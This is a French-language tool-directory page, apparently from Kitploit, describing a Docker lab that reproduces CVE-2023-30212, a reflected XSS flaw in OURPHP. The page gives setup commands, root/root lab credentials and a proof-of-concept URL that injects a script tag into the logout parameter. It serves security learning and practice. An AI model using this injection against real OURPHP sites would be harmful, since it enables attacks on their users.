Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-30212 — Laboratoire OURPHP vulnérable basé sur Docker pour reproduire CVE-2023-30212, une vulnérabilité XSS réfléchie, avec instructions d'installation et URL d'exploit preuve de concept. | Kitploit
Outils/GitHubGitHub/aash035/cve-2023-30212
Sécurité des ConteneursAnalyse des VulnérabilitésExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubaash035/cve-2023-30212

CVE-2023-30212

Laboratoire OURPHP vulnérable basé sur Docker pour reproduire CVE-2023-30212, une vulnérabilité XSS réfléchie, avec instructions d'installation et URL d'exploit preuve de concept.

Voir le dépôt
13il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

MISE EN PLACE DU LABORATOIRE CVE-2023-30212

Prérequis
Télécharger docker.io
sudo apt install -y docker.io


ÉTAPES
  1. Téléchargez tous les fichiers de mon dépôt en utilisant la commande ci-dessous.
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. Maintenant, pour créer une image Docker, exécutez la commande suivante :
    sudo docker build -t vuln .

  3. Ensuite, il faut transformer l'image Docker en conteneur. Le conteneur doit fonctionner sur le port 80. La commande est :
    sudo docker run -d -p 80:80 vuln

  4. Pour vérifier si le conteneur est actif, utilisez la commande :
    sudo docker ps

  5. Tapez 127.0.0.1 dans le navigateur et une page OURPHP se chargera.

  6. Vous devez configurer ourphp avec les informations suivantes :
    Nom d'utilisateur : root
    Mot de passe : root
    Nom de la base de données : vuln

  7. Maintenant, vous devez configurer le nom d'utilisateur et le mot de passe pour l'administrateur. Définissez les éléments suivants :
    Nom d'utilisateur : root
    Mot de passe : root

  8. Maintenant, copiez le lien ci-dessous et collez-le dans le navigateur :
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

Télécharger l’outil